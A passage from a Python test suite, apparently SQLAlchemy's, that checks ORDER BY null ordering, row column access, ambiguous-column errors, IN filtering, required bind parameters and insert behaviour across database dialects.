order_by=[users.c.user_name, users.c.user_id]),
[(3, 'a'), (2, 'b'), (1, 'c')])
a_eq(users.select(distinct=True,
use_labels=labels,
order_by=[users.c.user_id]),
[(1, 'c'), (2, 'b'), (3, 'a')])
a_eq(select([users.c.user_id.label('foo')],
distinct=True,
use_labels=labels,
order_by=[users.c.user_id]),
[(1,), (2,), (3,)])
a_eq(select([users.c.user_id.label('a'),
users.c.user_id.label('b'),
users.c.user_name],
use_labels=labels,
order_by=[users.c.user_id]),
[(1, 1, 'c'), (2, 2, 'b'), (3, 3, 'a')])
a_eq(users.select(distinct=True,
use_labels=labels,
order_by=[desc(users.c.user_id)]),
[(3, 'a'), (2, 'b'), (1, 'c')])
a_eq(select([users.c.user_id.label('foo')],
distinct=True,
use_labels=labels,
order_by=[users.c.user_id.desc()]),
[(3,), (2,), (1,)])
@testing.requires.nullsordering
def test_order_by_nulls(self):
"""Exercises ORDER BY clause generation.
Tests simple, compound, aliased and DESC clauses.
"""
users.insert().execute(user_id=1)
users.insert().execute(user_id=2, user_name='b')
users.insert().execute(user_id=3, user_name='a')
def a_eq(executable, wanted):
got = list(executable.execute())
eq_(got, wanted)
for labels in False, True:
a_eq(users.select(order_by=[users.c.user_name.nullsfirst()],
use_labels=labels),
[(1, None), (3, 'a'), (2, 'b')])
a_eq(users.select(order_by=[users.c.user_name.nullslast()],
use_labels=labels),
[(3, 'a'), (2, 'b'), (1, None)])
a_eq(users.select(order_by=[asc(users.c.user_name).nullsfirst()],
use_labels=labels),
[(1, None), (3, 'a'), (2, 'b')])
a_eq(users.select(order_by=[asc(users.c.user_name).nullslast()],
use_labels=labels),
[(3, 'a'), (2, 'b'), (1, None)])
a_eq(users.select(order_by=[users.c.user_name.desc().nullsfirst()],
use_labels=labels),
[(1, None), (2, 'b'), (3, 'a')])
a_eq(
users.select(
order_by=[users.c.user_name.desc().nullslast()],
use_labels=labels),
[(2, 'b'), (3, 'a'), (1, None)])
a_eq(
users.select(
order_by=[desc(users.c.user_name).nullsfirst()],
use_labels=labels),
[(1, None), (2, 'b'), (3, 'a')])
a_eq(users.select(order_by=[desc(users.c.user_name).nullslast()],
use_labels=labels),
[(2, 'b'), (3, 'a'), (1, None)])
a_eq(
users.select(
order_by=[users.c.user_name.nullsfirst(), users.c.user_id],
use_labels=labels),
[(1, None), (3, 'a'), (2, 'b')])
a_eq(
users.select(
order_by=[users.c.user_name.nullslast(), users.c.user_id],
use_labels=labels),
[(3, 'a'), (2, 'b'), (1, None)])
def test_column_slices(self):
users.insert().execute(user_id=1, user_name='john')
users.insert().execute(user_id=2, user_name='jack')
addresses.insert().execute(
address_id=1, user_id=2, address='foo@bar.com')
r = text(
"select * from query_addresses", bind=testing.db).execute().first()
self.assert_(r[0:1] == (1,))
self.assert_(r[1:] == (2, 'foo@bar.com'))
self.assert_(r[:-1] == (1, 2))
def test_column_accessor_basic_compiled(self):
users.insert().execute(
dict(user_id=1, user_name='john'),
dict(user_id=2, user_name='jack')
)
r = users.select(users.c.user_id == 2).execute().first()
self.assert_(r.user_id == r['user_id'] == r[users.c.user_id] == 2)
self.assert_(
r.user_name == r['user_name'] == r[users.c.user_name] == 'jack')
def test_column_accessor_basic_text(self):
users.insert().execute(
dict(user_id=1, user_name='john'),
dict(user_id=2, user_name='jack')
)
r = testing.db.execute(
text("select * from query_users where user_id=2")).first()
self.assert_(r.user_id == r['user_id'] == r[users.c.user_id] == 2)
self.assert_(
r.user_name == r['user_name'] == r[users.c.user_name] == 'jack')
def test_column_accessor_textual_select(self):
users.insert().execute(
dict(user_id=1, user_name='john'),
dict(user_id=2, user_name='jack')
)
# this will create column() objects inside
# the select(), these need to match on name anyway
r = testing.db.execute(
select([
column('user_id'), column('user_name')
]).select_from(table('query_users')).
where(text('user_id=2'))
).first()
self.assert_(r.user_id == r['user_id'] == r[users.c.user_id] == 2)
self.assert_(
r.user_name == r['user_name'] == r[users.c.user_name] == 'jack')
def test_column_accessor_dotted_union(self):
users.insert().execute(
dict(user_id=1, user_name='john'),
)
# test a little sqlite weirdness - with the UNION,
# cols come back as "query_users.user_id" in cursor.description
r = testing.db.execute(
text(
"select query_users.user_id, query_users.user_name "
"from query_users "
"UNION select query_users.user_id, "
"query_users.user_name from query_users"
)
).first()
eq_(r['user_id'], 1)
eq_(r['user_name'], "john")
eq_(list(r.keys()), ["user_id", "user_name"])
@testing.only_on("sqlite", "sqlite specific feature")
def test_column_accessor_sqlite_raw(self):
users.insert().execute(
dict(user_id=1, user_name='john'),
)
r = text(
"select query_users.user_id, query_users.user_name "
"from query_users "
"UNION select query_users.user_id, "
"query_users.user_name from query_users",
bind=testing.db).execution_options(sqlite_raw_colnames=True). \
execute().first()
assert 'user_id' not in r
assert 'user_name' not in r
eq_(r['query_users.user_id'], 1)
eq_(r['query_users.user_name'], "john")
eq_(list(r.keys()), ["query_users.user_id", "query_users.user_name"])
@testing.only_on("sqlite", "sqlite specific feature")
def test_column_accessor_sqlite_translated(self):
users.insert().execute(
dict(user_id=1, user_name='john'),
)
r = text(
"select query_users.user_id, query_users.user_name "
"from query_users "
"UNION select query_users.user_id, "
"query_users.user_name from query_users",
bind=testing.db).execute().first()
eq_(r['user_id'], 1)
eq_(r['user_name'], "john")
eq_(r['query_users.user_id'], 1)
eq_(r['query_users.user_name'], "john")
eq_(list(r.keys()), ["user_id", "user_name"])
def test_column_accessor_labels_w_dots(self):
users.insert().execute(
dict(user_id=1, user_name='john'),
)
# test using literal tablename.colname
r = text(
'select query_users.user_id AS "query_users.user_id", '
'query_users.user_name AS "query_users.user_name" '
'from query_users', bind=testing.db).\
execution_options(sqlite_raw_colnames=True).execute().first()
eq_(r['query_users.user_id'], 1)
eq_(r['query_users.user_name'], "john")
assert "user_name" not in r
eq_(list(r.keys()), ["query_users.user_id", "query_users.user_name"])
def test_column_accessor_unary(self):
users.insert().execute(
dict(user_id=1, user_name='john'),
)
# unary experssions
r = select([users.c.user_name.distinct()]).order_by(
users.c.user_name).execute().first()
eq_(r[users.c.user_name], 'john')
eq_(r.user_name, 'john')
def test_column_accessor_err(self):
r = testing.db.execute(select([1])).first()
assert_raises_message(
AttributeError,
"Could not locate column in row for column 'foo'",
getattr, r, "foo"
)
assert_raises_message(
KeyError,
"Could not locate column in row for column 'foo'",
lambda: r['foo']
)
def test_graceful_fetch_on_non_rows(self):
"""test that calling fetchone() etc. on a result that doesn't
return rows fails gracefully.
"""
# these proxies don't work with no cursor.description present.
# so they don't apply to this test at the moment.
# result.FullyBufferedResultProxy,
# result.BufferedRowResultProxy,
# result.BufferedColumnResultProxy
conn = testing.db.connect()
for meth in [
lambda r: r.fetchone(),
lambda r: r.fetchall(),
lambda r: r.first(),
lambda r: r.scalar(),
lambda r: r.fetchmany(),
lambda r: r._getter('user'),
lambda r: r._has_key('user'),
]:
trans = conn.begin()
result = conn.execute(users.insert(), user_id=1)
assert_raises_message(
exc.ResourceClosedError,
"This result object does not return rows. "
"It has been closed automatically.",
meth, result,
)
trans.rollback()
@testing.requires.empty_inserts
@testing.requires.returning
def test_no_inserted_pk_on_returning(self):
result = testing.db.execute(users.insert().returning(
users.c.user_id, users.c.user_name))
assert_raises_message(
exc.InvalidRequestError,
r"Can't call inserted_primary_key when returning\(\) is used.",
getattr, result, 'inserted_primary_key'
)
def test_fetchone_til_end(self):
result = testing.db.execute("select * from query_users")
eq_(result.fetchone(), None)
eq_(result.fetchone(), None)
eq_(result.fetchone(), None)
result.close()
assert_raises_message(
exc.ResourceClosedError,
"This result object is closed.",
result.fetchone
)
def test_row_case_sensitive(self):
row = testing.db.execute(
select([
literal_column("1").label("case_insensitive"),
literal_column("2").label("CaseSensitive")
])
).first()
eq_(list(row.keys()), ["case_insensitive", "CaseSensitive"])
in_("case_insensitive", row._keymap)
in_("CaseSensitive", row._keymap)
not_in_("casesensitive", row._keymap)
eq_(row["case_insensitive"], 1)
eq_(row["CaseSensitive"], 2)
assert_raises(
KeyError,
lambda: row["Case_insensitive"]
)
assert_raises(
KeyError,
lambda: row["casesensitive"]
)
def test_row_case_sensitive_unoptimized(self):
ins_db = engines.testing_engine(options={"case_sensitive": True})
row = ins_db.execute(
select([
literal_column("1").label("case_insensitive"),
literal_column("2").label("CaseSensitive"),
text("3 AS screw_up_the_cols")
])
).first()
eq_(
list(row.keys()),
["case_insensitive", "CaseSensitive", "screw_up_the_cols"])
in_("case_insensitive", row._keymap)
in_("CaseSensitive", row._keymap)
not_in_("casesensitive", row._keymap)
eq_(row["case_insensitive"], 1)
eq_(row["CaseSensitive"], 2)
eq_(row["screw_up_the_cols"], 3)
assert_raises(KeyError, lambda: row["Case_insensitive"])
assert_raises(KeyError, lambda: row["casesensitive"])
assert_raises(KeyError, lambda: row["screw_UP_the_cols"])
def test_row_case_insensitive(self):
ins_db = engines.testing_engine(options={"case_sensitive": False})
row = ins_db.execute(
select([
literal_column("1").label("case_insensitive"),
literal_column("2").label("CaseSensitive")
])
).first()
eq_(list(row.keys()), ["case_insensitive", "CaseSensitive"])
in_("case_insensitive", row._keymap)
in_("CaseSensitive", row._keymap)
in_("casesensitive", row._keymap)
eq_(row["case_insensitive"], 1)
eq_(row["CaseSensitive"], 2)
eq_(row["Case_insensitive"], 1)
eq_(row["casesensitive"], 2)
def test_row_case_insensitive_unoptimized(self):
ins_db = engines.testing_engine(options={"case_sensitive": False})
row = ins_db.execute(
select([
literal_column("1").label("case_insensitive"),
literal_column("2").label("CaseSensitive"),
text("3 AS screw_up_the_cols")
])
).first()
eq_(
list(row.keys()),
["case_insensitive", "CaseSensitive", "screw_up_the_cols"])
in_("case_insensitive", row._keymap)
in_("CaseSensitive", row._keymap)
in_("casesensitive", row._keymap)
eq_(row["case_insensitive"], 1)
eq_(row["CaseSensitive"], 2)
eq_(row["screw_up_the_cols"], 3)
eq_(row["Case_insensitive"], 1)
eq_(row["casesensitive"], 2)
eq_(row["screw_UP_the_cols"], 3)
def test_row_as_args(self):
users.insert().execute(user_id=1, user_name='john')
r = users.select(users.c.user_id == 1).execute().first()
users.delete().execute()
users.insert().execute(r)
eq_(users.select().execute().fetchall(), [(1, 'john')])
def test_result_as_args(self):
users.insert().execute([
dict(user_id=1, user_name='john'),
dict(user_id=2, user_name='ed')])
r = users.select().execute()
users2.insert().execute(list(r))
eq_(
users2.select().order_by(users2.c.user_id).execute().fetchall(),
[(1, 'john'), (2, 'ed')]
)
users2.delete().execute()
r = users.select().execute()
users2.insert().execute(*list(r))
eq_(
users2.select().order_by(users2.c.user_id).execute().fetchall(),
[(1, 'john'), (2, 'ed')]
)
@testing.requires.duplicate_names_in_cursor_description
def test_ambiguous_column(self):
users.insert().execute(user_id=1, user_name='john')
result = users.outerjoin(addresses).select().execute()
r = result.first()
assert_raises_message(
exc.InvalidRequestError,
"Ambiguous column name",
lambda: r['user_id']
)
assert_raises_message(
exc.InvalidRequestError,
"Ambiguous column name",
lambda: r[users.c.user_id]
)
assert_raises_message(
exc.InvalidRequestError,
"Ambiguous column name",
lambda: r[addresses.c.user_id]
)
# try to trick it - fake_table isn't in the result!
# we get the correct error
fake_table = Table('fake', MetaData(), Column('user_id', Integer))
assert_raises_message(
exc.InvalidRequestError,
"Could not locate column in row for column 'fake.user_id'",
lambda: r[fake_table.c.user_id]
)
r = util.pickle.loads(util.pickle.dumps(r))
assert_raises_message(
exc.InvalidRequestError,
"Ambiguous column name",
lambda: r['user_id']
)
result = users.outerjoin(addresses).select().execute()
result = _result.BufferedColumnResultProxy(result.context)
r = result.first()
assert isinstance(r, _result.BufferedColumnRow)
assert_raises_message(
exc.InvalidRequestError,
"Ambiguous column name",
lambda: r['user_id']
)
@testing.requires.duplicate_names_in_cursor_description
def test_ambiguous_column_by_col(self):
users.insert().execute(user_id=1, user_name='john')
ua = users.alias()
u2 = users.alias()
result = select([users.c.user_id, ua.c.user_id]).execute()
row = result.first()
assert_raises_message(
exc.InvalidRequestError,
"Ambiguous column name",
lambda: row[users.c.user_id]
)
assert_raises_message(
exc.InvalidRequestError,
"Ambiguous column name",
lambda: row[ua.c.user_id]
)
# Unfortunately, this fails -
# we'd like
# "Could not locate column in row"
# to be raised here, but the check for
# "common column" in _compare_name_for_result()
# has other requirements to be more liberal.
# Ultimately the
# expression system would need a way to determine
# if given two columns in a "proxy" relationship, if they
# refer to a different parent table
assert_raises_message(
exc.InvalidRequestError,
"Ambiguous column name",
lambda: row[u2.c.user_id]
)
@testing.requires.duplicate_names_in_cursor_description
def test_ambiguous_column_contains(self):
# ticket 2702. in 0.7 we'd get True, False.
# in 0.8, both columns are present so it's True;
# but when they're fetched you'll get the ambiguous error.
users.insert().execute(user_id=1, user_name='john')
result = select([users.c.user_id, addresses.c.user_id]).\
select_from(users.outerjoin(addresses)).execute()
row = result.first()
eq_(
set([users.c.user_id in row, addresses.c.user_id in row]),
set([True])
)
def test_ambiguous_column_by_col_plus_label(self):
users.insert().execute(user_id=1, user_name='john')
result = select(
[users.c.user_id,
type_coerce(users.c.user_id, Integer).label('foo')]).execute()
row = result.first()
eq_(
row[users.c.user_id], 1
)
eq_(
row[1], 1
)
def test_fetch_partial_result_map(self):
users.insert().execute(user_id=7, user_name='ed')
t = text("select * from query_users").columns(
user_name=String()
)
eq_(
testing.db.execute(t).fetchall(), [(7, 'ed')]
)
def test_fetch_unordered_result_map(self):
users.insert().execute(user_id=7, user_name='ed')
class Goofy1(TypeDecorator):
impl = String
def process_result_value(self, value, dialect):
return value + "a"
class Goofy2(TypeDecorator):
impl = String
def process_result_value(self, value, dialect):
return value + "b"
class Goofy3(TypeDecorator):
impl = String
def process_result_value(self, value, dialect):
return value + "c"
t = text(
"select user_name as a, user_name as b, "
"user_name as c from query_users").columns(
a=Goofy1(), b=Goofy2(), c=Goofy3()
)
eq_(
testing.db.execute(t).fetchall(), [
('eda', 'edb', 'edc')
]
)
@testing.requires.subqueries
def test_column_label_targeting(self):
users.insert().execute(user_id=7, user_name='ed')
for s in (
users.select().alias('foo'),
users.select().alias(users.name),
):
row = s.select(use_labels=True).execute().first()
assert row[s.c.user_id] == 7
assert row[s.c.user_name] == 'ed'
def test_keys(self):
users.insert().execute(user_id=1, user_name='foo')
result = users.select().execute()
eq_(
result.keys(),
['user_id', 'user_name']
)
row = result.first()
eq_(
row.keys(),
['user_id', 'user_name']
)
def test_keys_anon_labels(self):
"""test [ticket:3483]"""
users.insert().execute(user_id=1, user_name='foo')
result = testing.db.execute(
select([
users.c.user_id,
users.c.user_name.label(None),
func.count(literal_column('1'))]).
group_by(users.c.user_id, users.c.user_name)
)
eq_(
result.keys(),
['user_id', 'user_name_1', 'count_1']
)
row = result.first()
eq_(
row.keys(),
['user_id', 'user_name_1', 'count_1']
)
def test_items(self):
users.insert().execute(user_id=1, user_name='foo')
r = users.select().execute().first()
eq_(
[(x[0].lower(), x[1]) for x in list(r.items())],
[('user_id', 1), ('user_name', 'foo')])
def test_len(self):
users.insert().execute(user_id=1, user_name='foo')
r = users.select().execute().first()
eq_(len(r), 2)
r = testing.db.execute('select user_name, user_id from query_users'). \
first()
eq_(len(r), 2)
r = testing.db.execute('select user_name from query_users').first()
eq_(len(r), 1)
def test_sorting_in_python(self):
users.insert().execute(
dict(user_id=1, user_name='foo'),
dict(user_id=2, user_name='bar'),
dict(user_id=3, user_name='def'),
)
rows = users.select().order_by(users.c.user_name).execute().fetchall()
eq_(rows, [(2, 'bar'), (3, 'def'), (1, 'foo')])
eq_(sorted(rows), [(1, 'foo'), (2, 'bar'), (3, 'def')])
def test_column_order_with_simple_query(self):
# should return values in column definition order
users.insert().execute(user_id=1, user_name='foo')
r = users.select(users.c.user_id == 1).execute().first()
eq_(r[0], 1)
eq_(r[1], 'foo')
eq_([x.lower() for x in list(r.keys())], ['user_id', 'user_name'])
eq_(list(r.values()), [1, 'foo'])
def test_column_order_with_text_query(self):
# should return values in query order
users.insert().execute(user_id=1, user_name='foo')
r = testing.db.execute('select user_name, user_id from query_users'). \
first()
eq_(r[0], 'foo')
eq_(r[1], 1)
eq_([x.lower() for x in list(r.keys())], ['user_name', 'user_id'])
eq_(list(r.values()), ['foo', 1])
@testing.crashes('oracle', 'FIXME: unknown, varify not fails_on()')
@testing.crashes('firebird', 'An identifier must begin with a letter')
def test_column_accessor_shadow(self):
meta = MetaData(testing.db)
shadowed = Table(
'test_shadowed', meta,
Column('shadow_id', INT, primary_key=True),
Column('shadow_name', VARCHAR(20)),
Column('parent', VARCHAR(20)),
Column('row', VARCHAR(40)),
Column('_parent', VARCHAR(20)),
Column('_row', VARCHAR(20)),
)
shadowed.create(checkfirst=True)
try:
shadowed.insert().execute(
shadow_id=1, shadow_name='The Shadow', parent='The Light',
row='Without light there is no shadow',
_parent='Hidden parent', _row='Hidden row')
r = shadowed.select(shadowed.c.shadow_id == 1).execute().first()
self.assert_(
r.shadow_id == r['shadow_id'] == r[shadowed.c.shadow_id] == 1)
self.assert_(
r.shadow_name == r['shadow_name'] ==
r[shadowed.c.shadow_name] == 'The Shadow')
self.assert_(
r.parent == r['parent'] == r[shadowed.c.parent] == 'The Light')
self.assert_(
r.row == r['row'] == r[shadowed.c.row] ==
'Without light there is no shadow')
self.assert_(r['_parent'] == 'Hidden parent')
self.assert_(r['_row'] == 'Hidden row')
finally:
shadowed.drop(checkfirst=True)
@testing.emits_warning('.*empty sequence.*')
def test_in_filtering(self):
"""test the behavior of the in_() function."""
users.insert().execute(user_id=7, user_name='jack')
users.insert().execute(user_id=8, user_name='fred')
users.insert().execute(user_id=9, user_name=None)
s = users.select(users.c.user_name.in_([]))
r = s.execute().fetchall()
# No username is in empty set
assert len(r) == 0
s = users.select(not_(users.c.user_name.in_([])))
r = s.execute().fetchall()
# All usernames with a value are outside an empty set
assert len(r) == 2
s = users.select(users.c.user_name.in_(['jack', 'fred']))
r = s.execute().fetchall()
assert len(r) == 2
s = users.select(not_(users.c.user_name.in_(['jack', 'fred'])))
r = s.execute().fetchall()
# Null values are not outside any set
assert len(r) == 0
@testing.emits_warning('.*empty sequence.*')
@testing.fails_on('firebird', "uses sql-92 rules")
@testing.fails_on('sybase', "uses sql-92 rules")
@testing.fails_if(
lambda: testing.against('mssql+pyodbc') and not
testing.db.dialect.freetds, "uses sql-92 rules")
def test_bind_in(self):
"""test calling IN against a bind parameter.
this isn't allowed on several platforms since we
generate ? = ?.
"""
users.insert().execute(user_id=7, user_name='jack')
users.insert().execute(user_id=8, user_name='fred')
users.insert().execute(user_id=9, user_name=None)
u = bindparam('search_key')
s = users.select(not_(u.in_([])))
r = s.execute(search_key='john').fetchall()
assert len(r) == 3
r = s.execute(search_key=None).fetchall()
assert len(r) == 0
@testing.emits_warning('.*empty sequence.*')
def test_literal_in(self):
"""similar to test_bind_in but use a bind with a value."""
users.insert().execute(user_id=7, user_name='jack')
users.insert().execute(user_id=8, user_name='fred')
users.insert().execute(user_id=9, user_name=None)
s = users.select(not_(literal("john").in_([])))
r = s.execute().fetchall()
assert len(r) == 3
@testing.emits_warning('.*empty sequence.*')
@testing.requires.boolean_col_expressions
def test_in_filtering_advanced(self):
"""test the behavior of the in_() function when
comparing against an empty collection, specifically
that a proper boolean value is generated.
"""
users.insert().execute(user_id=7, user_name='jack')
users.insert().execute(user_id=8, user_name='fred')
users.insert().execute(user_id=9, user_name=None)
s = users.select(users.c.user_name.in_([]) == True) # noqa
r = s.execute().fetchall()
assert len(r) == 0
s = users.select(users.c.user_name.in_([]) == False) # noqa
r = s.execute().fetchall()
assert len(r) == 2
s = users.select(users.c.user_name.in_([]) == None) # noqa
r = s.execute().fetchall()
assert len(r) == 1
class RequiredBindTest(fixtures.TablesTest):
run_create_tables = None
run_deletes = None
@classmethod
def define_tables(cls, metadata):
Table(
'foo', metadata,
Column('id', Integer, primary_key=True),
Column('data', String(50)),
Column('x', Integer)
)
def _assert_raises(self, stmt, params):
assert_raises_message(
exc.StatementError,
"A value is required for bind parameter 'x'",
testing.db.execute, stmt, **params)
assert_raises_message(
exc.StatementError,
"A value is required for bind parameter 'x'",
testing.db.execute, stmt, params)
def test_insert(self):
stmt = self.tables.foo.insert().values(
x=bindparam('x'), data=bindparam('data'))
self._assert_raises(stmt, {'data': 'data'})
def test_select_where(self):
stmt = select([self.tables.foo]). \
where(self.tables.foo.c.data == bindparam('data')). \
where(self.tables.foo.c.x == bindparam('x'))
self._assert_raises(stmt, {'data': 'data'})
@testing.requires.standalone_binds
def test_select_columns(self):
stmt = select([bindparam('data'), bindparam('x')])
self._assert_raises(
stmt, {'data': 'data'}
)
def test_text(self):
stmt = text("select * from foo where x=:x and data=:data1")
self._assert_raises(
stmt, {'data1': 'data'}
)
def test_required_flag(self):
is_(bindparam('foo').required, True)
is_(bindparam('foo', required=False).required, False)
is_(bindparam('foo', 'bar').required, False)
is_(bindparam('foo', 'bar', required=True).required, True)
c = lambda: None
is_(bindparam('foo', callable_=c, required=True).required, True)
is_(bindparam('foo', callable_=c).required, False)
is_(bindparam('foo', callable_=c, required=False).required, False)
class TableInsertTest(fixtures.TablesTest):
"""test for consistent insert behavior across dialects
regarding the inline=True flag, lower-case 't' tables.
"""
run_create_tables = 'each'
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
'foo', metadata,
Column('id', Integer, Sequence('t_id_seq'), primary_key=True),
Column('data', String(50)),
Column('x', Integer)
)
def _fixture(self, types=True):
if types:
t = sql.table(
'foo', sql.column('id', Integer),
sql.column('data', String),
sql.column('x', Integer))
else:
t = sql.table(
'foo', sql.column('id'), sql.column('data'), sql.column('x'))
return t
def _test(self, stmt, row, returning=None, inserted_primary_key=False):
r = testing.db.execute(stmt)
if returning:
returned = r.first()
eq_(returned, returning)
elif inserted_primary_key is not False:
eq_(r.inserted_primary_key, inserted_primary_key)
eq_(testing.db.execute(self.tables.foo.select()).first(), row)
def _test_multi(self, stmt, rows, data):
testing.db.execute(stmt, rows)
eq_(
testing.db.execute(
self.tables.foo.select().
order_by(self.tables.foo.c.id)).fetchall(),
data)
@testing.requires.sequences
def test_expicit_sequence(self):
t = self._fixture()
self._test(
t.insert().values(
id=func.next_value(Sequence('t_id_seq')), data='data', x=5),
(1, 'data', 5)
)
def test_uppercase(self):
t = self.tables.foo
self._test(
t.insert().values(id=1, data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[1]
)
def test_uppercase_inline(self):
t = self.tables.foo
self._test(
t.insert(inline=True).values(id=1, data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[1]
)
@testing.crashes(
"mssql+pyodbc",
"Pyodbc + SQL Server + Py3K, some decimal handling issue")
def test_uppercase_inline_implicit(self):
t = self.tables.foo
self._test(
t.insert(inline=True).values(data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[None]
)
def test_uppercase_implicit(self):
t = self.tables.foo
self._test(
t.insert().values(data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[1]
)
def test_uppercase_direct_params(self):
t = self.tables.foo
self._test(
t.insert().values(id=1, data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[1]
)
@testing.requires.returning
def test_uppercase_direct_params_returning(self):
t = self.tables.foo
self._test(
t.insert().values(id=1, data='data', x=5).returning(t.c.id, t.c.x),
(1, 'data', 5),
returning=(1, 5)
)
@testing.fails_on(
'mssql', "lowercase table doesn't support identity insert disable")
def test_direct_params(self):
t = self._fixture()
self._test(
t.insert().values(id=1, data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[]
)
@testing.fails_on(
'mssql', "lowercase table doesn't support identity insert disable")
@testing.requires.returning
def test_direct_params_returning(self):
t = self._fixture()
self._test(
t.insert().values(id=1, data='data', x=5).returning(t.c.id, t.c.x),
(1, 'data', 5),
returning=(1, 5)
)
@testing.requires.emulated_lastrowid
def test_implicit_pk(self):
t = self._fixture()
self._test(
t.insert().values(data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[]
)
@testing.requires.emulated_lastrowid
def test_implicit_pk_multi_rows(self):
t = self._fixture()
self._test_multi(
t.insert(),
[
{'data': 'd1', 'x': 5},
{'data': 'd2', 'x': 6},
{'data': 'd3', 'x': 7},
],
[
(1, 'd1', 5),
(2, 'd2', 6),
(3, 'd3', 7)
],
)
@testing.requires.emulated_lastrowid
def test_implicit_pk_inline(self):
t = self._fixture()
self._test(
t.insert(inline=True).values(data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[]
)
class KeyTargetingTest(fixtures.TablesTest):
run_inserts = 'once'
run_deletes = None
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
'keyed1', metadata, Column("a", CHAR(2), key="b"),
Column("c", CHAR(2), key="q")
)
Table('keyed2', metadata, Column("a", CHAR(2)), Column("b", CHAR(2)))
Table('keyed3', metadata, Column("a", CHAR(2)), Column("d", CHAR(2)))
Table('keyed4', metadata, Column("b", CHAR(2)), Column("q", CHAR(2)))
Table('content', metadata, Column('t', String(30), key="type"))
Table('bar', metadata, Column('ctype', String(30), key="content_type"))
if testing.requires.schemas.enabled:
Table(
'wschema', metadata,
Column("a", CHAR(2), key="b"),
Column("c", CHAR(2), key="q"),
schema=testing.config.test_schema
)
@classmethod
def insert_data(cls):
cls.tables.keyed1.insert().execute(dict(b="a1", q="c1"))
cls.tables.keyed2.insert().execute(dict(a="a2", b="b2"))
cls.tables.keyed3.insert().execute(dict(a="a3", d="d3"))
cls.tables.keyed4.insert().execute(dict(b="b4", q="q4"))
cls.tables.content.insert().execute(type="t1")
if testing.requires.schemas.enabled:
cls.tables['%s.wschema' % testing.config.test_schema].insert().execute(
dict(b="a1", q="c1"))
@testing.requires.schemas
def test_keyed_accessor_wschema(self):
keyed1 = self.tables['%s.wschema' % testing.config.test_schema]
row = testing.db.execute(keyed1.select()).first()
eq_(row.b, "a1")
eq_(row.q, "c1")
eq_(row.a, "a1")
eq_(row.c, "c1")
def test_keyed_accessor_single(self):
keyed1 = self.tables.keyed1
row = testing.db.execute(keyed1.select()).first()
eq_(row.b, "a1")
eq_(row.q, "c1")
eq_(row.a, "a1")
eq_(row.c, "c1")
def test_keyed_accessor_single_labeled(self):
keyed1 = self.tables.keyed1
row = testing.db.execute(keyed1.select().apply_labels()).first()
eq_(row.keyed1_b, "a1")
eq_(row.keyed1_q, "c1")
eq_(row.keyed1_a, "a1")
eq_(row.keyed1_c, "c1")
@testing.requires.duplicate_names_in_cursor_description
def test_keyed_accessor_composite_conflict_2(self):
keyed1 = self.tables.keyed1
keyed2 = self.tables.keyed2
row = testing.db.execute(select([keyed1, keyed2])).first()
# row.b is unambiguous
eq_(row.b, "b2")
# row.a is ambiguous
assert_raises_message(
exc.InvalidRequestError,
"Ambig",
getattr, row, "a"
)
def test_keyed_accessor_composite_names_precedent(self):
keyed1 = self.tables.keyed1
keyed4 = self.tables.keyed4
row = testing.db.execute(select([keyed1, keyed4])).first()
eq_(row.b, "b4")
eq_(row.q, "q4")
eq_(row.a, "a1")
eq_(row.c, "c1")
@testing.requires.duplicate_names_in_cursor_description
def test_keyed_accessor_composite_keys_precedent(self):
keyed1 = self.tables.keyed1
keyed3 = self.tables.keyed3
row = testing.db.execute(select([keyed1, keyed3])).first()
eq_(row.q, "c1")
assert_raises_message(
exc.InvalidRequestError,
"Ambiguous column name 'b'",
getattr, row, "b"
)
assert_raises_message(
exc.InvalidRequestError,
"Ambiguous column name 'a'",
getattr, row, "a"
)
eq_(row.d, "d3")
def test_keyed_accessor_composite_labeled(self):
keyed1 = self.tables.keyed1
keyed2 = self.tables.keyed2
row = testing.db.execute(select([keyed1, keyed2]).apply_labels()). \
first()
eq_(row.keyed1_b, "a1")
eq_(row.keyed1_a, "a1")
eq_(row.keyed1_q, "c1")
eq_(row.keyed1_c, "c1")
eq_(row.keyed2_a, "a2")
eq_(row.keyed2_b, "b2")
assert_raises(KeyError, lambda: row['keyed2_c'])
assert_raises(KeyError, lambda: row['keyed2_q'])
def test_column_label_overlap_fallback(self):
content, bar = self.tables.content, self.tables.bar
row = testing.db.execute(
select([content.c.type.label("content_type")])).first()
assert content.c.type not in row
assert bar.c.content_type not in row
assert sql.column('content_type') in row
row = testing.db.execute(select([func.now().label("content_type")])). \
first()
assert content.c.type not in row
assert bar.c.content_type not in row
assert sql.column('content_type') in row
def test_column_label_overlap_fallback_2(self):
content, bar = self.tables.content, self.tables.bar
row = testing.db.execute(content.select(use_labels=True)).first()
assert content.c.type in row
assert bar.c.content_type not in row
assert sql.column('content_type') not in row
def test_columnclause_schema_column_one(self):
keyed2 = self.tables.keyed2
# this is addressed by [ticket:2932]
# ColumnClause._compare_name_for_result allows the
# columns which the statement is against to be lightweight
# cols, which results in a more liberal comparison scheme
a, b = sql.column('a'), sql.column('b')
stmt = select([a, b]).select_from(table("keyed2"))
row = testing.db.execute(stmt).first()
assert keyed2.c.a in row
assert keyed2.c.b in row
assert a in row
assert b in row
def test_columnclause_schema_column_two(self):
keyed2 = self.tables.keyed2
a, b = sql.column('a'), sql.column('b')
stmt = select([keyed2.c.a, keyed2.c.b])
row = testing.db.execute(stmt).first()
assert keyed2.c.a in row
assert keyed2.c.b in row
assert a in row
assert b in row
def test_columnclause_schema_column_three(self):
keyed2 = self.tables.keyed2
# this is also addressed by [ticket:2932]
a, b = sql.column('a'), sql.column('b')
stmt = text("select a, b from keyed2").columns(a=CHAR, b=CHAR)
row = testing.db.execute(stmt).first()
assert keyed2.c.a in row
assert keyed2.c.b in row
assert a in row
assert b in row
assert stmt.c.a in row
assert stmt.c.b in row
def test_columnclause_schema_column_four(self):
keyed2 = self.tables.keyed2
# this is also addressed by [ticket:2932]
a, b = sql.column('keyed2_a'), sql.column('keyed2_b')
stmt = text("select a AS keyed2_a, b AS keyed2_b from keyed2").columns(
a, b)
row = testing.db.execute(stmt).first()
assert keyed2.c.a in row
assert keyed2.c.b in row
assert a in row
